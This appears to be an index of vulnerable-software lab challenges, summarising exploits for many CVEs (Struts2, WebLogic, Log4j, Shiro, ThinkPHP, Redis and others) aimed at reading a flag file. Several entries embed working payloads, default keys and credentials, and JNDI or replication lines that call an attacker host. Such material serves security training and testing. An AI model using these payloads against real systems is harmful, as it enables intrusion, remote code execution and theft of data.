💀 CVE Box

Authenticated Jolokia JMX bridge: POST crafted JSON to invoke ClassPathXmlApplicationContext with attacker-controlled URL for RCE.

Send ExceptionResponse OpenWire packet triggering ClassPathXmlApplicationContext with attacker URL. Loads Spring XML bean that executes OS command.

Authenticated Airflow user exploits command injection in DAG example to run arbitrary OS commands via the Airflow scheduler.

Exploit Airflow Celery executor arbitrary command execution via crafted task payload when the broker is accessible without auth.

Unauthenticated RCE in AJ-Report via crafted dataSetParam injection in the test interface that executes Groovy/JS code server-side.

Unauthenticated RCE via Apache Druid native query with embedded JavaScript or Groovy code when javascript.enabled=true.

Exploit Java deserialization in Apereo CAS 4.1 via the login endpoint to execute gadget chain and run OS commands.

Exploit Apache APISIX default admin API key (edd1c9f034335f136f87ad84b625c8f1) to manage routes and inject malicious Lua code for RCE.

Unauthenticated RCE via APISIX Dashboard API. Missing auth on /apisix/admin/routes allows creating route with malicious plugin executing OS commands.

Shellshock: inject OS commands in Bash environment variable values (e.g. User-Agent). CGI scripts pass HTTP headers as env vars, triggering execution.

Unauthenticated command injection in Cacti via X-Forwarded-For header in pollers.php. Inject OS command in the IP parameter processed by poller_item.

Authenticated RCE in Cacti via malicious package import that executes PHP code during the graph template import process.

SSTI or command injection via Chartbrew dashboard template rendering when user-controlled data flows into server-side rendering engine.

Unauthenticated SSTI in CMS Made Simple Smarty template engine via crafted URL parameter. Inject {system('cat /flag_proof')} in template context.

Unauthenticated path traversal + deserialization in ColdFusion 2021/2023. Reach restricted admin endpoint to trigger arbitrary Java deserialization.

Exploit Java deserialization via ColdFusion WDDX endpoint. Send crafted serialized payload triggering gadget chain to execute OS commands as ColdFusion process.

Server-Side Template Injection or path traversal in ComfyUI workflow nodes allows reading arbitrary files or executing OS commands via crafted workflow JSON.

Unauthenticated RCE in ComfyUI via malicious custom node or workflow that executes arbitrary Python code on the ComfyUI server.

Path traversal in Widget Connector macro loads remote FreeMarker template. Inject SSTI payload or use SSRF to reach internal services.

Unauthenticated OGNL injection via setup wizard endpoint. Evaluates OGNL expression in URL parameter to execute arbitrary OS commands.

Inject OGNL in URI path without auth (e.g. /%24%[email protected]...%7D/). Direct OS command execution via Confluence OGNL evaluation.

Unauthenticated POST to Velocity template endpoint. Template injection payload in body executes OS commands without credentials.

Admin sets malicious OS command as query_server (PUT /_config/query_servers/cmd). Trigger via design document view using that server.

Default Erlang cookie (monster) allows cluster join via epmd port. Execute arbitrary Erlang code as CouchDB process to read DB contents.

Unauthenticated RCE in Craft CMS via SSTI in Twig template rendering when user input flows into templateString() without sanitization.

PHP object injection in Craft CMS via unsafe unserialize() call. Craft gadget chain allows writing a PHP shell or executing OS commands.

Pre-auth RCE in Craft CMS 5.x via crafted request to template rendering endpoint that bypasses authentication and evaluates Twig expressions.

Send crafted UDP packet to cups-browsed (port 631) with malicious PPD URL. cups-browsed fetches it and executes FoomaticRIPCommandLine for RCE.

Discuz! arbitrary file deletion via crafted formhash parameter. Chain with cache poisoning to achieve PHP code execution.

Unauthenticated Docker API (port 2375) exposed without TLS. Create privileged container mounting host filesystem to read /flag_proof from host.

YAML deserialization in Drupal 8 via unsafe use of Symfony YAML component. Craft PHP gadget chain in YAML to execute OS commands.

Exploit Form API #access callback bypass on user/register endpoint. Inject PHP via render array without authentication for direct command execution.

Extension of Drupalgeddon2 (CVE-2018-7600) via destination parameter. Exploits same Form API flaw in authenticated or unauthenticated context.

PHAR deserialization via crafted image upload in Drupal. Upload PHAR-as-image, trigger deserialization via file processing to execute PHP gadget chain.

Elasticsearch dynamic scripting: POST /_search with MVEL script 'import java.io.*;new java.util.Scanner(Runtime.exec(cmd).getInputStream()).next()' executes OS commands.

Groovy sandbox escape in Elasticsearch. Send search with script containing java.lang.Math.class.forName('java.lang.Runtime') to bypass sandbox and exec OS commands.

Remote code execution in Electron app on Windows via custom URI scheme handler. Inject command via crafted URI that bypasses shell argument sanitization.

Electron apps with contextIsolation disabled allow JavaScript from loaded web content to access Node.js APIs and execute OS commands.

elFinder PHP connector RCE via crafted archive extraction. Upload malicious archive that extracts to web-accessible path with PHP webshell.

Unauthenticated RCE in Erlang/OTP SSH server. Send crafted SSH message before authentication to execute arbitrary OS commands on the server.

Send JSON with @type=com.sun.rowset.JdbcRowSetImpl and dataSourceName=ldap://attacker/a. fastjson instantiates class triggering JNDI lookup and remote class loading.

Bypass fastjson 1.2.25+ blacklist using java.lang.Class to cache malicious class in loadClass. Then instantiate via JNDI to execute OS commands.

Eval injection in GeoServer JAI-EXT processing. Crafted raster processing expression executes arbitrary Java code on the server.

OGC filter treats property names as XPath/OGC expressions via GeoTools. Craft property name with exec() call for unauthenticated RCE.

Ghostscript -dSAFER bypass via crafted PostScript. Inject OS command in .ps file processed by Ghostscript via image conversion pipeline.

Bypass Ghostscript sandbox via pdfwrite device parameters. Crafted PDF triggers arbitrary code execution during rendering.

Ghostscript sandbox escape via subroutine in procedure params. Craft PostScript to bypass -dSAFER restrictions and execute OS commands.

Exploit git-shell command restriction bypass. Send crafted repository name containing shell metacharacters to execute arbitrary commands on git server.

Exploit Gitea 1.4 Git hooks via repository admin. Set pre-receive/post-receive hook to arbitrary OS command executed on every git push.

Upload crafted DjVu image with malicious ExifTool metadata to GitLab upload endpoint. ExifTool processes it unauthenticated triggering command injection.

Command injection in Gitlist via crafted git object name. The blame view passes user-controlled ref name to git command without proper escaping.

Exploit GoAhead CGI environment injection via malformed request. Inject environment variables like LD_PRELOAD to load malicious shared library and execute code.

RCE in GoAhead via crafted multipart request that injects environment variables when CGI is enabled. Shellshock-style attack via HTTP headers.

RCE in Grafana via plugin DuckDB backend. Craft SQL query using DuckDB read_text() or shell execution functions to read /flag_proof.

H2 database console allows ALIAS CREATE with Java code execution. CREATE ALIAS EXEC AS 'String exec(String cmd) throws Exception {Runtime.getRuntime().exec(cmd);}'; CALL EXEC('cmd').

JNDI injection in H2 database INIT script via JDBC URL. Craft jdbc:h2:mem:testdb;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT with JNDI lookup for RCE.

Unauthenticated H2 console allows direct SQL execution. Execute CREATE ALIAS + CALL to run arbitrary Java/OS commands from the console.

Submit application to YARN ResourceManager REST API (port 8088) without auth. Application executes OS command in new container reading /flag_proof.

RCE in HertzBeat monitoring platform via unsafe Groovy script execution in custom monitoring templates accessible to authenticated users.

Upload .shtml file with SSI directive <!--#exec cmd='cat /flag_proof'-->. Apache mod_include executes command when serving the file.

Unauthenticated RCE in Apache HugeGraph Server via Gremlin API endpoint. Execute Gremlin groovy expression containing Thread.currentThread().getContextClassLoader() for OS command execution.

ImageTragick: upload crafted MVG/SVG with 'url(https://|cmd)' directive. ImageMagick executes embedded shell command during image processing.

Inject shell commands in ImageMagick -authenticate parameter via crafted filename. Commands execute during image processing pipeline.

RCE in ingress-nginx controller via AdmissionWebhook. Craft malicious Ingress annotation containing nginx config injection that executes OS commands.

Jackson deserialization RCE via @type field. Send crafted JSON with com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl to execute OS commands.

Java RMI remote class loading: connect to exposed RMI registry, invoke method that triggers codebase URL fetch. Server loads and executes remote class.

Bypass RMI registry bind restrictions (post-JDK8u141) using DGC (Distributed Garbage Collector) endpoint for unauthenticated deserialization RCE.

Java RMI registry deserialization: send crafted serialized object to RMI registry bind() call. Registry deserializes payload executing gadget chain.

POST Java serialized Commons-Collections gadget to /invoker/JMXInvokerServlet. JBoss deserializes without auth executing OS commands.

POST serialized Java payload to /invoker/JMXInvokerServlet (HTTP Invoker). JBoss EAP 4.x deserializes unauthenticated requests for RCE.

Send HTTP POST with Java deserialization payload to JMXInvokerServlet or EJBInvokerServlet. Use Commons-Collections gadget chain for OS command execution.

Java deserialization in Jenkins CLI via crafted Java serialized object sent to TCP port 50000. Commons-Collections gadget chain executes OS commands.

Exploit Stapler routing to reach unauthenticated ClassPathResourceHandler. Chain with dynamic routing to access restricted endpoints and execute Groovy scripts.

Unauthenticated SSTI in JimuReport queryFieldBySql endpoint. Inject FreeMarker template expression that executes OS commands without authentication.

Unauthenticated RCI in JMeter via exposed RMI registry (port 1099). Connect and invoke RCE via JMXConnector to execute arbitrary Java code.

Authenticated Kafka Connect REST API allows JDBC connector with JNDI URL in connection string. Triggers JNDI lookup and remote class loading for RCE.

Kibana Timelion prototype pollution via .es() expression. Pollute Object.prototype to execute OS commands when canvas renders the visualization.

Kibana SSTI via Vega visualization spec. Craft Vega spec with arbitrary JavaScript in signal handlers that executes in Kibana server context.

Zip-slip vulnerability in kkFileView document preview server. Upload crafted ZIP with path traversal to overwrite web-accessible files and achieve RCE.

Unauthenticated RCE in Langflow via /api/v1/run endpoint. Execute arbitrary Python code through crafted flow definition without authentication.

Laravel debug mode: exploit Ignition make-script to write Phar to log path. Trigger Phar deserialization via log manipulation for RCE.

Liferay Portal Java deserialization via /api/jsonws. POST crafted serialized payload invoking Commons-Collections gadget chain for unauthenticated RCE.

File upload path traversal in Laravel Livewire. Upload component stores files at attacker-controlled path outside intended directory, enabling webshell placement.

Log4j 1.x SocketServer deserialization: connect to exposed port and send serialized Java payload. Commons-Collections gadget chain executes OS commands.

Inject ${jndi:ldap://attacker/a} in User-Agent or X-Api-Version header. Host rogue LDAP server returning class executing OS commands. Read /flag_proof after shell access.

Pre-auth RCE in Metabase via H2 database JDBC URL injection in setup endpoint. Craft JDBC URL with INIT script executing OS commands.

MeterSphere plugin upload functionality allows arbitrary JAR execution. Upload malicious plugin with embedded RCE payload that reads /flag_proof on activation.

RCE in mongo-express via unsafe eval of BSON. Send crafted collection query with JavaScript payload to execute commands: {$where: 'return run("cat","/flag_proof")'}

Nacos Derby SQL injection via the QoS endpoint. Inject SQL payload in GET /nacos/v1/cs/ops/derby?sql= to extract user credentials from internal Derby database.

Sonatype Nexus Repository Manager RCE via Groovy script in REST API. POST crafted Groovy payload to /_api/rest/v1/script endpoint to execute OS commands.

Nexus Repository Manager 3.x EL injection in asset upload API. Inject EL expressions in filename parameter to achieve RCE without authentication.

Nexus Repository Manager 3.x privilege escalation via role manipulation. Chain CSRF with authenticated session to elevate privileges and access admin functions.

Remote code execution in node-postgres via prototype pollution. Inject malicious __proto__ properties in query parameters to achieve RCE in Node.js application.

Apache OFBiz XML-RPC deserialization RCE. Send crafted serialized Java object to /webtools/control/xmlrpc endpoint without authentication to execute OS commands.

Apache OFBiz authentication bypass via URL manipulation. Append USERNAME&PASSWORD&requirePasswordChange=Y to bypass login check and access admin functions.

Apache OFBiz pre-auth RCE via view override parameter. Combine authentication bypass with ProgramExport to execute arbitrary Groovy code as unauthenticated user.

Apache OFBiz direct request bypass chained with SSTI. Exploit override view mechanism to inject server-side template expressions and achieve code execution.

Apache OFBiz SSRF via ViewHandlerExt chained with internal service abuse. Pivot through internal network using SSRF to reach restricted management endpoints.

OpenSMTPD remote code execution via malicious MAIL FROM address. Send SMTP envelope with shell metacharacters in sender address to execute OS commands as root.

OpenTSDB parameter injection via HTTP API allows command execution. Inject shell metacharacters in gnuplot parameters via metric query to execute OS commands.

OpenTSDB SSRF and RCE via telnet API endpoint. Connect to telnet interface, inject HTTP parameter in metric name to execute gnuplot commands and read files.

PDF.js arbitrary JavaScript execution via malicious PDF font name. Serve crafted PDF that executes JS when rendered in browser, triggering XSS to exfiltrate session cookies.

pgAdmin 4 path traversal allows reading files outside web root. Exploit directory traversal in the file manager to access /flag_proof on the server.

pgAdmin 4 open redirect and CSRF token bypass. Chain open redirect with CSRF to perform admin actions without authorization and read sensitive configuration.

pgAdmin 4 remote code execution via query tool. Abuse COPY TO/FROM PROGRAM PostgreSQL feature through pgAdmin interface to execute OS commands.

pgAdmin 4 MFA bypass via session fixation. Manipulate session state to skip multi-factor authentication and access admin panel directly.

PHP 8.1.0-dev backdoor via User-Agentt header. Send HTTP request with User-Agentt: zerodiumsystem('cat /flag_proof'); to execute arbitrary PHP code.

PHP CGI argument injection allows remote code execution. Append ?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input to URL with PHP payload in body.

PHP imap_open SSRF/RCE via imap_open() with mailbox argument injection. Inject shell metacharacters in imap server parameter to execute OS commands via sendmail.

PHP-FPM buffer underflow RCE via nginx fastcgi_split_path_info regex. Send path with newline character to corrupt FPM memory and execute arbitrary code.

PHP iconv buffer overflow via crafted string conversion. Exploit heap overflow in iconv to achieve RCE through carefully crafted input to conversion functions.

PHP-FPM misconfiguration exposes port 9000 directly. Use Fastcgi protocol client to send requests directly to PHP-FPM, bypassing nginx access controls.

PHP Local File Inclusion via unvalidated include path parameter. Use ?page=../../../../flag_proof or PHP filter wrappers like php://filter/read to include flag file.

PHP Xdebug remote execution via exposed debug port 9000. Connect to Xdebug protocol, set breakpoint, and eval PHP code to read /flag_proof file.

phpMyAdmin RCE via preg_replace /e modifier in older PHP. Exploit SQL query with crafted regex replacement to execute PHP code through database query.

PHPUnit remote code execution via eval-stdin.php utility exposed in vendor directory. POST PHP code to /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php for instant RCE.

PostgreSQL COPY TO/FROM PROGRAM command execution. Use COPY (SELECT '') TO PROGRAM 'cat /flag_proof > /tmp/out' to execute OS commands via superuser SQL.

Pillow ghostscript command injection via EPS file processing. Upload crafted EPS image that injects shell commands through ghostscript interpreter during processing.

Pillow ImageMagick command injection via PDF processing. Upload crafted PDF that exploits ghostscript MVSave vulnerability to execute OS commands.

Python pickle deserialization RCE. Craft malicious pickle object using __reduce__ to execute OS commands: encode os.system('cat /flag_proof') in pickle payload.

React Server Components arbitrary file read via improper sanitization of server action imports. Craft malicious import path to read /flag_proof from server filesystem.

Redis unauthenticated access on port 6379. Connect directly: redis-cli -h target SLAVEOF attacker 6379, then use replication to write SSH key or cron for RCE.

Redis Lua sandbox escape via package.loadlib. Execute eval 'return package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so","luaopen_io")()' to achieve RCE.

Apache RocketMQ RCE via NameServer configuration update command. Send crafted update config request to port 9876 to execute OS commands through broker config injection.

Ruby Net::FTP command injection via crafted FTP server response. Exploit PASV response parsing to inject OS commands through FTP client library.

SaltStack shell injection via salt-api netapi. Send crafted request to /run endpoint with eauth=auto and shell metacharacters in client parameter to execute OS commands.

SambaCry: RCE in Samba writable share via shared library injection. Upload .so file to writable share, trigger load via IPC$ to execute arbitrary code (EternalRed).

Apache Shiro RememberMe cookie deserialization RCE. Encrypt malicious Java serialized payload with default AES key kPH+bIxk5D2deZiIxcaaaA== and send as rememberMe cookie.

ShowDoc arbitrary file upload via CKEditor image upload endpoint. Upload PHP webshell disguised as image to /public/uploads/ directory and execute commands.

Apache Solr XXE+SSRF leading to RCE via RunExecutableListener. Enable listener via Config API then trigger via query to execute OS commands on Solr server.

Apache Solr DataImportHandler RCE via script transformer. POST malicious Groovy script in DIH config to execute OS commands during data import.

Apache Solr Velocity template injection via Params ResourceLoader. Enable params.resource.loader.enabled then inject Velocity template in qt parameter for RCE.

Apache Spark unauthenticated REST API access. Submit malicious Spark job via POST /api/v1/applications or access master UI on port 8080 to execute code via job submission.

Spring Security OAuth2 RCE via SpEL injection in error response. Craft malicious authorization request with SpEL expression in scope parameter for code execution.

Spring Web Flow RCE via EL injection in flow definition expressions. Inject SpEL expressions via form field binding to execute arbitrary Java code.

Spring Data REST RCE via PATCH request with JSON Merge Patch. Send PATCH with T(java.lang.Runtime).getRuntime().exec() in path expression for RCE.

Spring Framework RCE via STOMP messaging over WebSocket. Inject SpEL expression in Message header subscription selector to execute OS commands.

Spring Data Commons RCE via SpEL injection in property path. Send POST with T(java.lang.Runtime).getRuntime().exec() in property binding expressions.

Spring Cloud Gateway SSRF/RCE via Actuator API. Add malicious route via POST /actuator/gateway/routes with AddResponseHeader filter containing SpEL expression for RCE.

Spring Cloud Function SpEL injection via spring.cloud.function.routing-expression header. Send crafted HTTP request with SpEL in header to execute OS commands.

Spring4Shell: RCE via data binding on class.module.classLoader. Bind ClassLoader properties to modify Tomcat log settings and write JSP webshell to server.

Struts2 OGNL injection in error message via %{expr} in form field. Submit %{@java.lang.Runtime@getRuntime().exec('cat /flag_proof')} in username field for RCE.

Struts2 OGNL remote code execution via parameters interceptor. Inject (#_memberAccess['allowStaticMethodAccess']=true)(exec command) in HTTP parameters.

Struts2 OGNL injection via invalid conversion. Trigger type conversion error with OGNL expression in parameter value to execute arbitrary Java code.

Struts2 devMode RCE via OGNL debug parameter. Access debug=command&expression=<ognl> parameter in devMode to execute arbitrary expressions.

Struts2 OGNL bypass via action chain. Use ognl.OgnlContext#DEFAULT_MEMBER_ACCESS to bypass security manager and execute OS commands via Java runtime.

Struts2 redirect action RCE via OGNL in redirect URL. Inject OGNL expression in redirect:${expression} action result URL for code execution.

Struts2 includeParams OGNL injection via URL/anchor tags. Inject OGNL via ${expr} in action attribute of s:url or s:a tags with includeParams=all.

Struts2 wildcard result OGNL injection. Map wildcard action to OGNL expression in result name — trigger via URL containing crafted OGNL payload in path.

Struts2 action prefix OGNL injection via redirect: prefix. Append redirect:${#context['xwork.MethodAccessor.denyMethodExecution']=false,...} to URL for RCE.

Struts2 Dynamic Method Invocation RCE via method prefix. Use method:OGNL_EXPR to invoke arbitrary methods when DMI is enabled in struts.xml.

Struts2 Jakarta multipart parser RCE via Content-Type header OGNL. Send multipart POST with OGNL expression in Content-Type header for unauthenticated RCE.

Struts2 Content-Disposition OGNL injection similar to S2-045. Inject OGNL in filename field of multipart upload Content-Disposition header for RCE.

Struts2 Struts 1 plugin OGNL injection via ActionMessage. Inject OGNL in message parameter of Struts 1 integration plugin for remote code execution.

Struts2 REST plugin XStream deserialization RCE. Send crafted XML payload to REST endpoint with Content-Type: application/xml to trigger XStream deserialization.

Struts2 Freemarker tag OGNL injection via FreeMarker templates. Inject OGNL expression in Freemarker template attribute ${(#_memberAccess...) } for code execution.

Struts2 namespace OGNL injection when namespace is not set and action is empty string. Inject OGNL via namespace in URL for RCE without prior authentication.

Struts2 OGNL injection via id attribute in UI tags. Inject OGNL expression in id attribute of s:url tag when evaluated as OGNL expression due to forced evaluation.

Struts2 OGNL sandbox bypass (S2-061). Use (#context=#attr['struts.valueStack'].context) bypass chain to escape OGNL sandbox and execute OS commands.

Apache Superset RCE via Pickle deserialization in Celery task metadata. Craft malicious pickled object in task parameters to execute OS commands on Superset server.

Supervisor XML-RPC interface RCE via supervisord API. Call supervisor.supervisord.options.warnings.os.system('cmd') on exposed XML-RPC port 9001 without auth.

TeamCity authentication bypass via exposed REST API endpoints. Access /app/rest/users/id:1/tokens to create API token without authentication, then use token for RCE.

ThinkPHP 2.x RCE via URL routing code evaluation. Access /?s=index/think\app/invokefunction&function=system&vars[]=id to execute OS commands directly.

ThinkPHP 5.x RCE via _method parameter override. POST _method=__construct&filter[]=system&method=GET&server[REQUEST_METHOD]=id to execute commands.

ThinkPHP 5.0.23 RCE via request method override. Exploit method=__construct to manipulate filter chain and execute system commands through controller invocation.

Apache Tomcat partial PUT session deserialization RCE. Upload serialized Java payload via partial PUT request, trigger deserialization via session lookup for RCE.

Apache Unomi MVEL/OGNL injection via crafted event payload. POST to /context.json with MVEL expression in condition script for unauthenticated RCE on CDP server.

Oracle WebLogic WLS-WebServices component deserialization RCE. POST crafted XMLDecoder payload to /wls-wsat/CoordinatorPortType11 for unauthenticated RCE.

Oracle WebLogic T3 protocol deserialization RCE. Send crafted T3 handshake with malicious serialized Java object to port 7001 to execute OS commands.

Oracle WebLogic Console authentication bypass via URL override. Access /console/css/%252e%252e%252fconsole.portal to bypass authentication and access admin functions.

Oracle WebLogic LDAP injection via OracleTextConnection. Bind malicious JNDI/LDAP URL to trigger LDAP lookup and achieve SSRF or remote class loading.

WebLogic console accessible with default credentials (weblogic:weblogic1 or weblogic:Oracle@123). Login to /console, deploy malicious WAR to achieve RCE.

Webmin 1.920 pre-auth RCE via password_change.cgi exploit. Send crafted POST with pipe metacharacters in old password field to execute OS commands without authentication.

WordPress + PHPMailer RCE via crafted email in registration. Register with malicious email containing shell metacharacters that get passed to sendmail for command execution.

XStream deserialization RCE via Groovy closure. Craft XML payload using com.thoughtworks.xstream.converters.collections.TreeMapConverter to execute Groovy scripts.

XStream server-side forgery via JMX invocation. Deserialize crafted XStream XML that triggers JMX MBean invocation to execute OS commands on server.

YApi unauthenticated access and RCE via mock scripts. Register account, create project, add mock script with require('child_process').execSync('cmd') for RCE.

Zabbix trapper command injection via active agent registration. Send crafted auto-registration request to Zabbix server trapper port 10051 to execute OS commands.

Zabbix active agent trapper integer overflow RCE. Send crafted active check response to Zabbix server trapper to trigger buffer overflow and execute shellcode.

Send crafted JMS ObjectMessage to ActiveMQ broker containing Commons-Collections gadget chain. Broker deserializes unauthenticated payload and executes OS command.

Unauthenticated Redis broker used by Celery allows injecting arbitrary serialized task payloads. Celery worker deserializes and executes the malicious task.

Java deserialization via ColdFusion AMF endpoint. Send crafted AMF3 payload with gadget chain to the /flex2gateway/amf endpoint for unauthenticated RCE.

Java deserialization in Apache Dubbo HTTP provider via crafted POST to exposed HTTP endpoint. Commons-Collections gadget chain executes OS commands.

PHP object injection via HTTP User-Agent/X-Forwarded-For in Joomla session handler. Craft serialized PHP payload to execute OS commands.

Apache Mojarra JSF ViewState Java deserialization. Craft malicious serialized ViewState payload using ysoserial to execute OS commands and read flag.

Neo4j 3.4 RMI deserialization via exposed RMI registry. Send crafted serialized payload to port 7474 RMI service using ysoserial CommonsCollections gadget.

Apache OFBiz authentication bypass via Groovy script execution. Access /webtools/control/ProgramExport without auth to execute Groovy code and read flag file.

phpMyAdmin SQL injection via parameter in setup.php. Inject into database parameter to extract mysql credentials from information_schema.

SQL injection in 1Panel Linux panel allows unauthenticated RCE. Craft malicious SQL payload to write webshell via outfile, then execute commands.

SQL injection in Cacti graph_view.php leads to RCE via stacked queries writing a PHP webshell to the web root.

SQL injection in CMS Made Simple search module. Time-based blind injection via m1_idlist parameter extracts admin credentials.

SQLi via JSONField key transform lookups. Parameter names not properly quoted allowing SQL injection through crafted ORM filter expressions.

SQLi in Django GIS database functions. Craft malicious geometry to inject SQL via GEOSGeomFromWKB and extract database contents.

Inject SQL via QuerySet.order_by() annotation with user-controlled input. Bypasses Django ORM escaping to execute arbitrary SQL.

SQLi via Trunc()/Extract() when user-controlled kind parameter flows without validation. Bypasses Django ORM quoting mechanism.

SQL injection via array parameter in Drupal DB API without authentication. Extract admin password hash from users table.

SQL injection in ECShop collection_list.php via id parameter. Extract admin credentials from database without authentication.

Remote code execution in ECShop via template injection in ECSHOP_USER_INFO cookie. Inject PHP code that gets evaluated in template rendering.

SQL injection in GeoServer OGC filter property name. Craft property containing SQL payload to execute arbitrary SQL against the spatial database backend.

SQL injection in Joomla com_fields via list[fullordering] parameter. No auth required. UNION-based extraction of admin credentials.

Blind SQL injection in Magento REST API product filter parameter. No auth required. Time-based injection extracts admin password hash.

Remote code execution in MeterSphere via Freemarker template injection in test script. Inject template directives to execute OS commands and read flag.

Rocket.Chat NoSQL injection in password reset allows admin account takeover. Inject {$gt: ''} in token field to bypass password reset validation and reset admin password.

SQL injection in ShowDoc 3.2.5 via item_id parameter. Inject UNION SELECT payload to extract admin credentials from the members table.

Apache SkyWalking GraphQL SQL injection. Inject malicious GraphQL query via /graphql endpoint to extract data from H2 database used by SkyWalking OAP server.

ThinkPHP SQL injection via IN operator array parameter. Inject array payload in where conditions to perform blind SQL injection and extract database contents.

YApi MongoDB injection via mock script. Inject MongoDB operator in JSON schema mock to extract user data from MongoDB without authentication.

Zabbix SQL injection in latest.php via toggle_ids parameter. Inject UNION SELECT to extract admin session tokens and MD5 passwords from Zabbix database.

Open redirect in Adminer allows phishing via crafted server parameter. Combine with SSRF to probe internal services and extract credentials.

SSRF in Apache CXF MTOM attachment processing allows server-side request to internal services via crafted multipart message.

SSRF in GeoServer OWS API via crafted service URL. Server fetches attacker-specified URL enabling internal network scanning.

Exploit Grafana datasource proxy without auth to perform SSRF. Reach internal flag_validator or admin-only metadata endpoints.

mod_proxy SSRF: craft request with unix:// or http:// URI targeting internal backend to bypass origin restrictions and reach internal services.

WebLogic UDDI registry SSRF via crafted SOAP request. Send SOAP to /uddiexplorer/SearchPublicRegistries.jsp to probe internal services and extract credentials.

PHP XXE via SimpleXML parsing of user-supplied XML. Inject external entity declaration to read /flag_proof from server filesystem via XML parsing.

Apache Solr XXE in XML query parsing. Send crafted XML query with external entity to /solr/collection/select to read /flag_proof from server filesystem.

Bypass Airflow authentication via JWT secret misconfiguration or default secret to forge admin session and access DAGs.

Bypass HTTP digest authentication in Appweb by omitting Authorization header on digest-only routes. Access admin endpoints without credentials.

Authentication bypass in Budibase via forged JWT or API key exposure allows admin access and server-side JS execution for RCE.

Broken access control allows unauthenticated POST to /setup/setupadministrator.action. Create admin account then use console for RCE via template injection.

CouchDB JSON/Erlang parser inconsistency: PUT user doc with duplicate 'roles' key creates admin unauthenticated. Exploit role escalation.

Forge Gogs remember-me cookie using known user ID. Craft signed cookie to authenticate as admin. Chain with Git hooks for arbitrary command execution.

Authentication bypass in HugeGraph REST API. Unauthenticated access to admin endpoints allows user creation and Gremlin RCE via API.

Buffer overflow or auth bypass in inetutils ftpd/telnetd. Exploit to gain unauthenticated shell access and read /flag_proof.

InfluxDB accepts JWT signed with empty secret. Craft valid JWT with empty secret and any username to gain admin access to all databases.

Improper access check on Joomla REST API returns database credentials in plaintext to unauthenticated requests.

Authentication bypass in JumpServer via forged JWT or HMAC bypass. Access admin endpoints to create new privileged sessions or execute commands.

Unauthenticated Jupyter Notebook server. Create notebook, execute Python cell: open('/flag_proof').read() or subprocess.check_output(['cat','/flag_proof']).

Authentication bypass in libssh server: send SSH2_MSG_USERAUTH_SUCCESS before authentication request. Server accepts connection as authenticated.

MySQL authentication bypass via timing attack on password comparison. Repeatedly attempt login with any password — ~1 in 256 attempts succeeds due to memcmp bug.

Nacos authentication bypass via User-Agent: Nacos-Server header. Access protected /nacos/v1/auth/users endpoint to add admin user, then exploit further to get RCE.

Next.js middleware auth bypass via x-middleware-subrequest header. Set header to skip middleware execution and access protected routes without authentication.

ntopng authentication bypass via password reset without old password verification. Reset admin password directly via API without authentication token.

Openfire path traversal in admin console allows unauthenticated access. Navigate to setup-completed bypassed pages to create admin account and achieve RCE via plugin upload.

rsync daemon unauthenticated access to exposed modules. Connect with rsync --list-only rsync://target/ to discover modules, then rsync rsync://target/module/ to download all files including flag.

Scrapyd unauthenticated access to management API. Deploy malicious Scrapy spider via POST /schedule.json to execute Python code on the server and read flag.

Apache Shiro authentication bypass via path normalization. Add semicolon or dot-slash to bypass Shiro URL pattern matching: /admin;/index to access protected resources.

Apache Shiro authentication bypass via Spring MVC pattern mismatch. Access /admin/ vs Shiro's /admin pattern matching difference to bypass authentication.

Spring Security RegexRequestMatcher auth bypass via regex edge cases. URL-encode characters to bypass regex pattern matching and access protected endpoints.

Apache Superset default SECRET_KEY allows session forgery. If using default SECRET_KEY (thisismysecretkey), forge admin Flask session cookie to access dashboard.

TeamCity auth bypass via alternative path (/app/rest with jsessionId bypass). Combine with RCE via admin user creation to execute OS commands on build server.

TikiWiki authentication bypass via empty password. In older versions, admin account with empty password hash allows login with any password — brute force admin panel.

Ghostcat: Apache JServ Protocol (AJP) file read/inclusion. Connect to AJP port 8009, request any file path to read including WEB-INF/web.xml and JSP execution.

Apache Tomcat manager application with default credentials (tomcat:tomcat). Login to /manager/html, deploy malicious WAR file containing JSP webshell for RCE.

uWSGI stats server unauthenticated access on port 1717. Connect to stats socket, enumerate workers, and exploit uWSGI magic variables to execute OS commands.

XXL-JOB executor unauthenticated access on port 9999. POST to /run endpoint with malicious GLUE script (Java) or BEAN handler to execute arbitrary code.

Upload JSP webshell via HTTP PUT to ActiveMQ fileserver, then HTTP MOVE it into the admin web directory. Trigger execution via GET.

Unauthenticated RPC access to aria2c daemon allows adding download tasks with out-of-path file names to write arbitrary files (e.g. SSH authorized_keys).

HTTP_PROXY env var injection via Proxy header in CGI scripts (HTTPoxy). Causes outbound requests to go through attacker-controlled proxy revealing internal traffic.

Open redirect via crafted file URL in Drupal. Chain with XSS to steal admin session or redirect to attacker-controlled site for credential harvesting.

Groovy/MVEL RCE via Elasticsearch dynamic script execution. Unauthenticated search query with script that invokes Runtime.exec() for OS command execution.

Server-side request forgery and RCE in n8n workflow automation via malicious webhook node. Craft workflow that executes arbitrary commands via HTTP Request node with file:// scheme.

Apache RocketMQ NameServer RCE via unauthorized config update. Bypass authentication to update filterServerNums config and trigger remote command execution.

SaltStack directory traversal in wheel module allows reading arbitrary files. Use wheel.fs.file.read with path traversal to read /etc/shadow or /flag_proof files.

Apache Tomcat arbitrary file upload via PUT method when readonly=false. PUT /webshell.jsp/ with JSP payload to deploy webshell and execute OS commands.

Oracle WebLogic arbitrary file upload via development console. Upload JSP webshell through /ws_utc/begin.do endpoint when dev console is enabled on port 7001.

Server-Side Template Injection in Flask/Jinja2. Inject {{config.__class__.__init__.__globals__['os'].popen('cat /flag_proof').read()}} in vulnerable template parameter.

SSRF in Jira ContactAdministrators action. Inject FreeMarker template in email subject for RCE, or use SSRF to reach internal-only services.

Adminer 4.6.2 file disclosure via SSRF to local MySQL. Connect to attacker-controlled MySQL server to read arbitrary files from the target.

Directory traversal via locale parameter in ColdFusion admin. Request /CFIDE/administrator/enter.cfm?locale=../../flag_proof to read arbitrary files.

Path traversal in Elasticsearch site plugin via /_plugin/<name>/../../../etc/passwd. Read arbitrary files from server without authentication.

Directory traversal in Elasticsearch snapshot API via crafted repository path. Read arbitrary files from the Elasticsearch server filesystem.

SSRF via crafted HLS playlist in FFmpeg. Attacker-controlled m3u8 playlist with file:// or http:// URLs causes FFmpeg to fetch and embed internal file contents.

